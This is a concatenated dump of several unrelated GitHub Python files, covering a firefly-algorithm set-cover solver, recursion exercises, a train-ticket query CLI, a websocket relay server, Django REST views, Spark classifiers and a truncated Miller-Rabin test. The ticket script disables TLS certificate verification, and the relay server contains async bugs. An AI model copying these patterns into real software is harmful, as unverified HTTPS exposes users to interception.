binary_fun = binarization(get_transfer_function(transfer_fun), discrete)\n repair_fun = repair_solution(table, costs, notation)\n fireflies = generate_solution((pop_size, len(costs)))\n curr_best = np.ones(len(costs))\n curr_best_intensity = np.inf\n\n if gamma_alter > 0:\n gamma = gamma / vector_dist(np.ones(len(costs)), np.zeros(len(costs)), distance) 
** gamma_alter\n print(f\"Gamma: {gamma}\")\n\n get_attractive = calc_attractive\n\n if alpha_0 == 0 or alpha_inf == 0:\n get_alpha = None\n else:\n get_alpha = lambda t: alpha_inf + (alpha_0 - alpha_inf) * (np.e ** -t)\n\n def lambda_move_best(x1, x2, betta, alpha=0.1):\n U = np.random.uniform(-1, 1, x1.shape)\n return x1 + betta * (x2 - x1) + alpha * U * (x1 - curr_best)\n\n def lambda_move(x1, x2, betta, alpha=0.1):\n U = np.random.uniform(-1, 1, x1.shape)\n return x1 + betta * (x2 - x1) + alpha * U\n\n if move_type == 1: # standart\n move_fun = move_fireflies\n elif move_type == 2: # lambda_best\n move_fun = lambda_move_best\n elif move_type == 3: # lambda\n move_fun = lambda_move\n else:\n raise ValueError(\"Error\")\n\n _ = list(map(repair_fun, fireflies))\n\n light_intensity = calc_fitness(fireflies, costs)\n\n for step in range(max_iter):\n print(step)\n print(f\"Elapsed time {time.time() - start_time}\")\n for i in range(len(fireflies)):\n for j in range(0, i):\n if light_intensity[j] < light_intensity[i]:\n fireflies[i] = move_fun(fireflies[i], fireflies[j],\n get_attractive(betta_0, gamma,\n vector_dist(fireflies[i], fireflies[j], distance),\n betta_pow), alpha)\n fireflies[i] = binary_fun(fireflies[i])\n repair_fun(fireflies[i])\n light_intensity[i] = calc_fitness(fireflies[i], costs)\n\n if get_alpha:\n alpha = get_alpha(step)\n\n best = np.argmin(light_intensity)\n if curr_best_intensity > light_intensity[best]:\n print(light_intensity[best])\n curr_best_intensity = light_intensity[best]\n curr_best = fireflies[best].copy()\n\n return curr_best, curr_best_intensity\n\n\ndef move_fireflies(x1, x2, betta, alpha=0.1):\n rand = np.random.sample(len(x1))\n return x1 + betta * (x2 - x1) + alpha * (rand - 0.5)\n\n\ndef calc_attractive(betta, gamma, r, m=2):\n return betta * np.e ** (-gamma * (r ** m))\n\n\ndef vector_dist(x1, x2, norm_type=\"euclid\"):\n if norm_type.lower() == \"euclid\":\n ord = 2\n elif norm_type.lower() == \"manhattan\":\n ord = 1\n elif norm_type.lower() == \"chebyshev\" or norm_type.lower() == \"cheb\":\n ord = np.Inf\n else:\n raise Exception(f\"Incorrect value {norm_type} for parameter type!\")\n return np.linalg.norm(x2 - x1, ord=ord)\n\n\ndef generate_solution(size):\n return np.random.randint(0, 2, size).astype(\"float\")\n\n\ndef calc_fitness(solution, costs):\n dim = 0 if solution.ndim == 1 else 1\n return np.array(np.sum(np.multiply(solution, costs), dim), dtype=\"float32\")\n\n\ndef get_transfer_function(transfer_fun=\"s1\"):\n if transfer_fun == 1:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-2.0 * x))\n elif transfer_fun == 2:\n transfer = lambda x: 1.0 / (1.0 + np.e ** -x)\n elif transfer_fun == 3:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-x / 2.0))\n elif transfer_fun == 4:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-x / 3.0))\n elif transfer_fun == 5:\n transfer = lambda x: 1.0 / (1.0 + np.e ** (-3.0 * x))\n elif transfer_fun == 6: # stan\n transfer = lambda x: np.abs(2 / np.pi * np.arctan(x * np.pi / 2))\n else:\n raise Exception(f\"Incorrect value {transfer_fun} for parameter transfer_fun!\")\n return transfer\n\n\ndef standard_discrete(transfer_fun, x):\n x = transfer_fun(x)\n r = np.random.sample(x.shape)\n return np.where(x >= r, 1.0, 0.0)\n\n\ndef binarization(transfer, discretization):\n def decorator(x):\n if x.ndim == 1:\n return discretization(transfer, x)\n else:\n return np.array([discretization(transfer, e) for e in x], dtype=float)\n\n return decorator\n\n\ndef repair_solution(table, costs, notation):\n rows = {elem[0] for 
elem in table}\n columns = {elem[1] for elem in table}\n alpha = {f: s for f, s in zip(\n rows, [{elem[1] for elem in table if elem[0] == t} for t in rows]\n )}\n betta = {f: s for f, s in zip(\n columns, [{elem[0] for elem in table if elem[1] == t} for t in columns]\n )}\n\n if notation.lower() == \"sc\":\n alpha, betta = betta, alpha\n rows = columns\n\n def wrapped(solution):\n S = {i + 1 for i, e in enumerate(solution) if e == 1.0}\n w_num = {e1: e2 for e1, e2 in zip(\n rows, [len(S & alpha[i]) for i in rows]\n )}\n U = {e for e in w_num if w_num[e] == 0}\n while U:\n row = U.pop()\n j = min(alpha[row],\n key=lambda r: np.Inf if len(U & betta[r]) == 0\n else costs[r - 1] / len(U & betta[r]))\n S.add(j)\n for curr in betta[j]: w_num[curr] += 1\n U = U - betta[j]\n\n S = list(reversed(list(S)))\n for row in S[:]:\n for curr in betta[row]:\n if w_num[curr] < 2:\n break\n else:\n S.remove(row)\n for c in betta[row]: w_num[c] -= 1\n S = np.array(S) - 1\n solution[:] = np.zeros(len(solution))\n solution[S] = 1.0\n\n return wrapped\n\n\ndef check_decision(data, result):\n n_cols = len(set(data.j))\n if n_cols == len(set(data[data.i.isin(result)].j)):\n print(\"Decision is correct\")\n else:\n print(\"DECISION WRONG\")\n\n\n\nstart_time = time.time()\n\n# set params\nnotation = \"sc\"\ntransfer_fun = 1\nevent_horizon = \"euclid\"\n\npop_size = 160\nmax_iter = 100\nInputDataSet = pd.read_csv(\"gen_test_160x1600.csv\", header=None, names=['i', 'j'])\nInputDataSet['Cost'] = 1\nif notation.lower() == \"sc\":\n cover_rows = np.unique(InputDataSet[\"i\"])\nelse:\n cover_rows = np.unique(InputDataSet[\"j\"])\n\ntmp_lst = InputDataSet[\"j\"].tolist()\ncosts = np.array(InputDataSet[\"Cost\"][[tmp_lst.index(e) for e in cover_rows]])\ntable = np.array(InputDataSet[[\"i\", \"j\"]])\n\n\noptimum, values = ffa_algorithm(table, costs, pop_size=pop_size, max_iter=max_iter, gamma=1, betta_0=1,\n notation=notation,\n transfer_fun=transfer_fun, distance=event_horizon, betta_pow=2,\n alpha=1, alpha_inf=0, alpha_0=0, gamma_alter=0,\n move_type=1)\nprint(f\"Elapsed time {time.time() - start_time}\")\nprint(f\"Result cost: {values}\")\nprint(f\"Optimuum: {[i + 1 for i, e in enumerate(optimum) if e > 0.0]}\")\n\noptimum = pd.DataFrame(np.where(optimum > 0.0)[0] + 1, columns=[\"Row_\"])\ncheck_decision(InputDataSet, list(optimum.Row_))\n","repo_name":"Makkksx/VKR2023","sub_path":"Алгоритм Светлячков/ffa.py","file_name":"ffa.py","file_ext":"py","file_size_in_byte":7477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26651328824","text":"\"\"\"\r\n定义了一个递归函数\r\n\"\"\"\r\n\r\ndef list_sum(num_list):\r\n if len(num_list) == 1: #定义了递归停止条件\r\n return num_list[0]\r\n else:\r\n return num_list[0] + list_sum(num_list[1:])\r\n\r\nprint(list_sum([1,2,3,4,5,6,7,8,9,10]))\r\n\r\n\r\ndef fac(n):\r\n if n == 0 or n == 1:\r\n return 1\r\n else:\r\n return n *fac(n-1)\r\n\r\nprint(sum([fac(i) for i in range(1,10)]))\r\n\r\ndef toStr(n,base):\r\n converString = \"0123456789ABCDE\"\r\n if n < base:\r\n return converString[n]\r\n else:\r\n return toStr(n//base,base) + converString[n % base]\r\nprint(toStr(256,2))\r\n\"\"\"\r\nimport turtle\r\n\r\nmyTurtle = turtle.Turtle()\r\nmyWin = turtle.Screen()\r\n\r\ndef drawSpiral(myTurtle, lineLen):\r\n if lineLen > -105:\r\n myTurtle.forward(lineLen)\r\n myTurtle.right(30)\r\n drawSpiral(myTurtle,lineLen-5)\r\n\r\ndrawSpiral(myTurtle,100)\r\nmyWin.exitonclick()\r\n\r\n\"\"\"\r\nimport turtle\r\n\r\ndef tree(branchLen,t):\r\n if 
branchLen > 5:\r\n        t.forward(branchLen)\r\n        t.right(20)\r\n        tree(branchLen-15,t)\r\n        t.left(40)\r\n        tree(branchLen-15,t)\r\n        t.right(20)\r\n        t.backward(branchLen)\r\n\r\ndef main():\r\n    t = turtle.Turtle()\r\n    myWin = turtle.Screen()\r\n    t.left(90)\r\n    t.up()\r\n    t.backward(100)\r\n    t.down()\r\n    t.color(\"green\")\r\n    tree(75,t)\r\n    myWin.exitonclick()\r\n\r\nmain()\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ZhaohuiTomas/data-structure","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71082388217","text":"'''\nUsage:\n    tickets [-dgktz] <from> <to> <date>\n\nOptions:\n    -h --help Show this help\n    -d D trains (EMU high-speed)\n    -g G trains (high-speed rail)\n    -k K trains (fast)\n    -t T trains (express)\n    -z Z trains (direct)\n\n\n'''\nfrom docopt import docopt\nimport urllib3\nurllib3.disable_warnings()\n\nimport requests\nimport stations\nfrom prettytable import PrettyTable\n\n\nclass TrainsInfo(object):\n    headers = 'Train Station Time Duration FirstClass SecondClass SoftSleeper HardSleeper SoftSeat HardSeat NoSeat'.split()\n\n    def __init__(self,raw_trains,options):\n        self.raw_trains=raw_trains\n        self.options=options\n\n    def get_from_to_station_name(self,data_list):\n        from_station_telecode=data_list[6]\n        to_station_telecode=data_list[7]\n        return '\\n'.join(\n            [\n                stations.get_name(from_station_telecode),\n                stations.get_name(to_station_telecode)\n            ]\n            \n        )\n    def get_start_arrive_time(self,data_list):\n        return '\\n'.join(\n            [\n                data_list[8],\n                data_list[9]\n\n            ]\n            \n        )\n    def need_print(self,data_list):\n        station_train_code=data_list[3]\n        initial=station_train_code[0].lower()\n        return (not self.options or initial in self.options)\n\n    def parse_train_data(self,data_list):\n        return {\n            'station_train_code': data_list[3],\n            'from_to_station_name': self.get_from_to_station_name(data_list),\n            'start_arrive_time': self.get_start_arrive_time(data_list),\n            'lishi': data_list[10],\n            'first_class_seat': data_list[31] or '--',\n            'second_class_seat': data_list[30] or '--',\n            'soft_sleep': data_list[23] or '--',\n            'hard_sleep': data_list[28] or '--',\n            'soft_seat': data_list[24] or '--',\n            'hard_seat': data_list[29] or '--',\n            'no_seat': data_list[33] or '--'\n        }\n\n\n    @property\n    def trains(self):\n        for train in self.raw_trains:\n            data_list = train.split('|')\n            if self.need_print(data_list):\n                yield self.parse_train_data(data_list).values()\n\n    def pretty_print(self):\n        pt = PrettyTable()\n        pt._set_field_names(self.headers)\n        for train in self.trains:\n            #print(train)\n            pt.add_row(train)\n        print(pt)\n\nclass TrainsCheck(object):\n    url=(\n        'https://kyfw.12306.cn/otn/leftTicket/query?'\n        'leftTicketDTO.train_date={}&'\n        'leftTicketDTO.from_station={}&'\n        'leftTicketDTO.to_station={}&'\n        'purpose_codes=ADULT'\n    ) \n    def __init__(self):\n        self.arguments = docopt(__doc__)\n        #print(self.arguments)\n        self.from_station = stations.get_telecode(self.arguments['<from>'])\n        self.to_station = stations.get_telecode(self.arguments['<to>']) \n        self.date = self.arguments['<date>']\n        #print(self.arguments.items())\n        self.options = ''.join([key for key, value in self.arguments.items() if value is True]) \n        \n    @property\n    def request_url(self):\n        return self.url.format(self.date , self.from_station, self.to_station)\n    \n    #2018-04-28\n    def run(self):\n        #print(self.request_url)\n        r= requests.get(self.request_url,verify=False)\n        #print(r.json())\n        trains = r.json()['data']['result']\n        TrainsInfo(trains,self.options).pretty_print()\n\nif __name__ == '__main__':\n    
TrainsCheck().run()","repo_name":"GitHubDiom/Tickets_Master","sub_path":"tickets-master/tickets.py","file_name":"tickets.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2519664141","text":"#!/usr/bin/env python\nimport time\n#TCP stuff\nimport socket\nTCP_IP = '0.0.0.0'\nTCP_PORT = 5008\nBUFFER_SIZE = 80 # Normally 1024, but we want fast response\n#global s\n#print('binding')\n#s.bind((TCP_IP, TCP_PORT))\n#s.listen(1)\ndef connectUpstream():\n print('Connecting to upstream server')\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print('binding')\n bound = False\n while not bound:\n try:\n s.bind((TCP_IP, TCP_PORT))\n bound = True\n except:\n print('Could not bind. Sleeping 1s and trying again.')\n time.sleep(1)\n pass\n s.listen(1)\n print('Bound. Awaiting connection...')\n global conn, addr\n conn, addr = s.accept()\n print('Connection address: ',addr)\n print('connection : ', conn)\n\nconnectUpstream()\n\n#handle websocket connections\nconnections = set()\nn=0\n\nasync def recvSensor():\n data = conn.recv(BUFFER_SIZE)\n #print(data)\n if not data:\n print('not data')\n conn.shutdown(1)\n conn.close()\n connectUpstream()\n return data.decode()\n\ndata = recvSensor()\n#conn, addr = s.accept()\n#print('Connection address:', addr)\n# WS server that sends messages at random intervals\nimport asyncio\nimport datetime\nimport random\nimport websockets\nasync def handler(websocket, path):\n #global n\n #n=n+1\n connections.add(websocket)\n #print(\"adding subscriber #\", n)\n #try:\n #async for msg in websocket:\n #pass # ignore\n #except websockets.ConnectionClosed:\n #pass\n #finally:\n #print(\"removing subscriber #\", n)\n #connections.remove(websocket)\n print(connections)\n #data = recvSensor()\n #await websocket.send(data.decode())\n await asyncio.sleep(0.001)\n while True:\n await asyncio.sleep(0.01)\n #now = datetime.datetime.utcnow().isoformat() + 'Z'\n #await websocket.send(now)\n #await asyncio.sleep(random.random() * 3)\n #data = conn.recv(BUFFER_SIZE)\n #print(data)\n data = await recvSensor()\n # = data.decode()\n print(data)\n #await websocket.send(data.decode())\n for websocket in connections:\n if not websocket.open:\n connections.remove(websocket)\n break \n await websocket.send(data)\n\nasync def wsSend():\n print('wssend')\n asyncio.get_event_loop().run_forever()\n while True:\n print('recv data')\n await recvSensor()\n print(connections)\n for websocket in connections:\n websocket.send(recvSensor())\nprint('starting server')\nstart_server = websockets.serve(handler, '0.0.0.0', 5009)\nprint('A')\nasyncio.get_event_loop().run_until_complete(start_server)\nprint('B')\nasyncio.get_event_loop().run_forever()\n \nprint('C')\n\n#loop = asyncio.get_event_loop()\n#loop.run_until_complete(wsSend())\n#print('D')\n#loop.run_forever()\n#print('E')\n#try:\n #asyncio.ensure_future(wsSend())\n #data = asyncio.async(recvSensor())\n #wsSend()\n #loop.run_forever()\n#except KeyboardInterrupt:\n #pass\n#finally:\n #print('closing loop')\n #loop.close()\n#asyncio.get_event_loop().run_forever()\n\n\n#while 1:\n #data = recvSensor()\n\n# if not data: break\n# print(data.decode())\n #conn.send(data) # echo\n#conn.close()\n","repo_name":"TKearney/thetickerplant","sub_path":"server/python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} 
+{"seq_id":"33325565746","text":"from django.db.models import Q\n\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import render, get_object_or_404\nfrom django_filters.conf import settings\nfrom djoser.compat import get_user_email\nfrom djoser.views import UserView\n\nfrom rest_framework.permissions import (\n AllowAny,\n IsAdminUser,\n IsAuthenticated,\n DjangoModelPermissions,\n IsAuthenticatedOrReadOnly,\n)\n\nfrom rest_framework.pagination import (\n LimitOffsetPagination,\n PageNumberPagination,\n)\nfrom rest_framework.filters import (\n SearchFilter,\n OrderingFilter,\n)\n# ###################################################\nfrom rest_framework.status import HTTP_200_OK\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\n# #################################################\nfrom rest_framework.generics import (\n ListAPIView,\n RetrieveAPIView,\n UpdateAPIView,\n DestroyAPIView,\n CreateAPIView,\n ListCreateAPIView,\n RetrieveUpdateAPIView,\n)\nfrom rest_framework.serializers import ModelSerializer\n\nfrom UserRegistrationApp.models import Profile, UserPreference\nfrom UserRegistrationApp.serializers import (ProfileCreateSerializer,\n ProfileListSerializer,\n ProfileDetailSerializer,\n ProfileUpdateSerializer,\n UserCreateSerializer,\n UserUpdateSerializer,\n UserSerializer,\n PreferenceCreateSerializer,\n )\n\nfrom .permissions import IsOwnerOrReadOnly, AllowAnonymous, IsProfileOwnerOrReadOnly\n\nfrom .pagination import ProfileLimitPagination\n\n# ######### START USER VIEWS ##########\n\nUser = get_user_model()\n\n\nclass UserCreateAPIView(CreateAPIView):\n\n serializer_class = UserCreateSerializer\n queryset = User.objects.all()\n permission_classes = [AllowAnonymous]\n\n# class UserUpdateAPIView(UpdateAPIView):\n# serializer_class = UserUpdateSerializer\n# queryset = User.objects.all()\n# permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n# ######### END USER VIEWS ###########\n\n# ######### START PROFILE VIEWS ##########\n# Just for view\n\n\nclass ProfileCreateAPIView(ListCreateAPIView):\n\n \"\"\"\n A class based view for creating and fetching student records\n \"\"\"\n permission_classes = (AllowAnonymous, AllowAny)\n pagination_class = ProfileLimitPagination\n serializer_class = ProfileCreateSerializer\n queryset = Profile.objects.all()\n\n def get(self, format: object = None) -> object:\n \"\"\"\n Get all the student records\n :param format: Format of the student records to return to\n :return: Returns a list of student records\n \"\"\"\n profiles = Profile.objects.all()\n serializer = ProfileCreateSerializer(profiles, many=True)\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n\n \"\"\"\n Create a student record\n :param format: Format of the student records to return to\n :param request: Request object for creating student\n :return: Returns a student record\n \"\"\"\n serializer = ProfileCreateSerializer(data=request.data)\n if serializer.is_valid(raise_exception=ValueError):\n # serializer.create(validated_data=request.data)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.error_messages,\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProfileALLListAPIView(ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n permission_classes = (IsAuthenticated, IsAdminUser,)\n pagination_class = ProfileLimitPagination # 
PageNumberPagination\n\n\nclass ProfileListAPIView(ListAPIView):\n # queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n filter_backends = [SearchFilter, OrderingFilter]\n search_fields = ['user__first_name', 'mobile_no', 'user__last_name']\n pagination_class = ProfileLimitPagination\n\n def get_queryset(self):\n # queryset_list = super(ProfileListAPIView, self).get_queryset(*args, **kwargs)\n # if you want to use the above line you should add the first comment in the class\n # but we can use different way by add queryset = Profile.objects.all() in the function\n\n queryset_list = Profile.objects.filter(public_profile_ind=True)\n query = self.request.GET.get(\"q\", )\n # should add self. before request.GET..etc. because it is ClassBasedView\n\n if query:\n queryset_list = queryset_list.filter(\n Q(user__first_name__contains=query) |\n Q(user__last_name__contains=query) |\n Q(user__email__contains=query) |\n Q(user__username__contains=query) |\n Q(mobile_no__icontains=query) |\n Q(facebook_id__icontains=query) |\n Q(google_id__icontains=query) |\n Q(longitude__icontains=query) |\n Q(latitude__icontains=query) |\n Q(height__icontains=query) |\n Q(weight__icontains=query)\n ).distinct()\n return queryset_list\n\n # permission_classes = (IsAuthenticated, IsAdminUser,)\n # pagination_class =\n\n\nclass ProfileDetailAPIView(RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileDetailSerializer\n lookup_field = 'user' # if i want to find without using pk\n\n\nclass ProfileUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileUpdateSerializer\n permission_classes = [IsAuthenticated, IsProfileOwnerOrReadOnly]\n\n # lookup_field = 'user'\n # lookup_url_kwarg = 'abc'\n #\n # def perform_update(self, serializer):\n # # super(ProfileUpdateAPIView, self).perform_update(serializer)\n #\n # serializer.save(user=self.request.user)\n\n # def perform_update(self, serializer):\n # serializer.save(user=self.request.user)\n\n\nclass ProfileDeleteAPIView(DestroyAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileListSerializer\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n # lookup_field = 'user'\n\n# Create your views here.\n#\n# from rest_framework import viewsets, generics, mixins, permissions\n# from rest_framework.parsers import FormParser, MultiPartParser\n#\n# from .models import Profile\n# from .serializers import ProfileSerializer\n#\n#\n# class ProfileView(viewsets.ModelViewSet):\n# queryset = Profile.objects.all()\n# serializer_class = ProfileSerializer\n# print('dasdasdasdadasdasdsd')\n\n\n# User = get_user_model()\n\n\nclass UserUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n # authentication_classes = (authentication.TokenAuthentication,)\n # permission_classes = (permissions.IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n def post(self, request):\n self.object = self.get_object()\n serializer = UserSerializer(self.object, data=request.data)\n if serializer.is_valid():\n self.object.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass PreferenceCreateAPIView(CreateAPIView):\n serializer_class = PreferenceCreateSerializer\n queryset = UserPreference.objects.all()\n permission_classes = [IsAuthenticated, 
IsOwnerOrReadOnly]\n\n\nclass PreferenceUpdateAPIView(RetrieveUpdateAPIView):\n serializer_class = PreferenceCreateSerializer\n queryset = UserPreference.objects.all()\n lookup_field = 'user'\n permission_classes = [IsAuthenticated, IsOwnerOrReadOnly]\n","repo_name":"HishamDigitalHub/SportActivities","sub_path":"UserRegistrationApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40613797940","text":"paths = [[\"London\", \"New York\"], [\"New York\", \"Lima\"], [\"Lima\", \"Sao Paulo\"]]\n\nfrom collections import defaultdict\n\n\ndef dest_city(paths):\n city_placement = defaultdict(list)\n unique_cities = set()\n for cities in paths:\n for i, city in enumerate(cities):\n city_placement[i].append(city)\n unique_cities.add(city)\n\n destination_city = city_placement[1]\n starting_city = city_placement[0]\n\n for city in destination_city:\n if city not in starting_city:\n return city\n","repo_name":"amymhaddad/solve_it","sub_path":"leetcode/destination_city/destination_city.py","file_name":"destination_city.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1576835364","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlugin to parse outputs from the scripts from cod-tools package.\nThis plugin is in the development stage. Andrius Merkys, 2014-10-29\n\"\"\"\nfrom aiida.parsers.plugins.codtools.ciffilter import CiffilterParser\nfrom aiida.orm.calculation.job.codtools.cifcodcheck import CifcodcheckCalculation\nfrom aiida.orm.data.parameter import ParameterData\n\n__copyright__ = u\"Copyright (c), 2015, ECOLE POLYTECHNIQUE FEDERALE DE LAUSANNE (Theory and Simulation of Materials (THEOS) and National Centre for Computational Design and Discovery of Novel Materials (NCCR MARVEL)), Switzerland and ROBERT BOSCH LLC, USA. 
All rights reserved.\"\n__license__ = \"MIT license, see LICENSE.txt file\"\n__version__ = \"0.4.0\"\n__contributors__ = \"Andrea Cepellotti, Andrius Merkys, Giovanni Pizzi\"\n\nclass CifcodcheckParser(CiffilterParser):\n \"\"\"\n Specific parser for the output of cif_cod_check script.\n \"\"\"\n def _check_calc_compatibility(self,calc):\n from aiida.common.exceptions import ParsingError\n if not isinstance(calc,CifcodcheckCalculation):\n raise ParsingError(\"Input calc must be a CifcodcheckCalculation\")\n\n def _get_output_nodes(self, output_path, error_path):\n \"\"\"\n Extracts output nodes from the standard output and standard error\n files.\n \"\"\"\n import re\n\n messages = []\n if output_path is not None:\n with open(output_path) as f:\n content = f.readlines()\n lines = [x.strip('\\n') for x in content]\n if re.search( ' OK$', lines[0] ) is not None:\n lines.pop(0)\n messages.extend(lines)\n\n if error_path is not None:\n with open(error_path) as f:\n content = f.readlines()\n lines = [x.strip('\\n') for x in content]\n messages.extend(lines)\n\n output_nodes = []\n output_nodes.append(('messages',\n ParameterData(dict={'output_messages':\n messages})))\n return output_nodes\n","repo_name":"BIGDATA2015-AIIDA-EXTENSION/Aiida-SQLAlchemy-Querytool","sub_path":"aiida/parsers/plugins/codtools/cifcodcheck.py","file_name":"cifcodcheck.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3709967623","text":"\"\"\"\n\nTask: Given string S, find out whether S is a valid regex or not\n\nInput: T containing number of test cases\nnext t lines are strings s\n\nOutput: return True or False\n\n\"\"\"\n\nimport re\n\n\nif __name__ == '__main__':\n n = int(input())\n for i in range(n):\n try:\n re.compile(input())\n print('True')\n except re.error:\n print('False')\n","repo_name":"alothings/python_challenges","sub_path":"hacker_rank/python/errors_exceptions/incorrect_regex.py","file_name":"incorrect_regex.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6047908486","text":"from pyspark import SparkConf, SparkContext\n\nfrom pyspark.sql import Row\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import SQLContext\n\nfrom pyspark.ml.linalg import DenseVector\nfrom pyspark.ml.feature import IndexToString , StringIndexer , VectorIndexer\n\nfrom pyspark.ml.classification import LogisticRegression , RandomForestClassifier\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\n# Spark set-up\nconf = SparkConf()\nconf.setAppName(\"Logistic regression\")\n\nsc = SparkContext(conf=conf)\nsc.setLogLevel(\"WARN\")\n\nspark = SparkSession(sc)\n\n# Load dataset file as RDD\nrdd = sc.textFile(\"/user/spark/iris.txt\")\nrdd = rdd.map(lambda x: x.split(','))\n\ndef renameLabel(x) :\n\tif x[4] == 'Iris-setosa':\n\t\tx[4] = 1\n\telif x[4] == 'Iris-versicolor':\n\t\tx[4] = 2\n\telse:\n\t\tx[4] = 3\n\treturn x\n\nrdd = rdd.map(renameLabel)\nrdd = rdd.map(lambda x: [float(x[0]), float(x[1]), float(x[2]), float(x[3]), int(x[4])]) \n\n# Create dataframe for ML model\ndf = spark.createDataFrame(rdd, [\"sep_len\", \"sep_wid\", \"pet_len\", \"pet_wid\", \"class\"])\ndata = df.rdd.map(lambda x: (DenseVector(x[:-1]), x[-1]))\ndf = spark.createDataFrame(data, [\"features\", \"label\"])\n\n# Split data into train and test\ntrain_data, test_data = df.randomSplit([.7,.3], seed=0)\n\n# Declare ML 
model\nlogistic = LogisticRegression(featuresCol = \"features\", labelCol = \"label\", maxIter=10, regParam=0.05)\n\n# Train the model using training data\nmodel = logistic.fit(train_data)\n\n# Check the model on test data\npredicted = model.transform(test_data)\npredictAndLabel = predicted.select(\"prediction\", \"label\")\nprint(predictAndLabel.show(20))\n\n# Model stats\naccuracy = model.summary.accuracy\nprecision = model.summary.weightedPrecision\nrecall = model.summary.weightedRecall\nfMeasure = model.summary.weightedFMeasure()\nprint(\"Accuracy: %0.2f\\nPrecision: %0.3f\\nRecall: %0.3f\\nF-measure: %0.3f\"\n % (accuracy, precision, recall, fMeasure))\n\n\ndata = df\n\nfrom pyspark.ml import Pipeline\n\nlabelIndexer = StringIndexer(inputCol=\"label\" , outputCol=\"indexedLabel\").fit(data)\nfeatureIndexer = VectorIndexer(inputCol=\"features\", outputCol=\"indexedFeatures\", maxCategories=4).fit(data)\n(trainingData,testData) = data.randomSplit([0.7,0.3])\nrf = RandomForestClassifier(labelCol=\"indexedLabel\",featuresCol=\"indexedFeatures\", numTrees=10)\nlabelConverter= IndexToString(inputCol=\"prediction\",outputCol=\"predictedLabel\",labels=labelIndexer.labels)\npipeline = Pipeline(stages=[labelIndexer,featureIndexer,rf,labelConverter])\nmodel = pipeline.fit(trainingData)\npred = model.transform(testData)\npred.select(\"predictedLabel\", \"label\", \"features\").show(8)\nevaltr = MulticlassClassificationEvaluator(labelCol = \"indexedLabel\" , predictionCol = \"prediction\" , metricName = \"accuracy\" )\naccuracy = evaltr.evaluate(pred)\nprint(\"Accuracy = %s\" % (accuracy))\nprint(\"Error = %s\" % (1.0 - accuracy)) \n","repo_name":"shahrukh-ak/Big-data_Spark-hands-on","sub_path":"shahrukh_khan_task6.py","file_name":"shahrukh_khan_task6.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"42882105390","text":"\"\"\"\nmiller_rabin\nThe Miller-Rabin Primality Test\n\"\"\"\n\n__author__ = \"Nic Manoogian\"\n\nimport argparse\nfrom random import randint\n\ndef miller_rabin(n, k=50):\n    \"\"\"\n    Miller-Rabin Primality Test\n    Returns true if n is a (probable) prime\n    Returns false if n is a composite number\n    \"\"\"\n    if n < 6:\n        return [False, False, True, True, False, True][n]\n    elif n & 1 == 0:\n        return False\n    s = 0\n    d = n - 1\n    while d % 2 == 0:\n        s = s + 1\n        d = d >> 1\n    for _ in range(k):\n        a = randint(2, n-2)\n        x = pow(a, d, n)\n        if x == 1 or x == n-1:\n            continue\n        for _ in range(s-1):\n            x = pow(x, 2, n)\n            if x == 1:\n                return False\n            elif x == n - 1:\n                a = 0\n                break\n        if a:\n            return False\n    return True\n\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description='Miller-Rabin Primality Test.')\n    parser.add_argument('start_value', help='value to begin testing', type=int)\n    parser.add_argument('end_value', help='value to end testing (inclusive)', type=int)\n    args = parser.parse_args()\n\n    for n in range(args.start_value, args.end_value+1):\n        if miller_rabin(n):\n            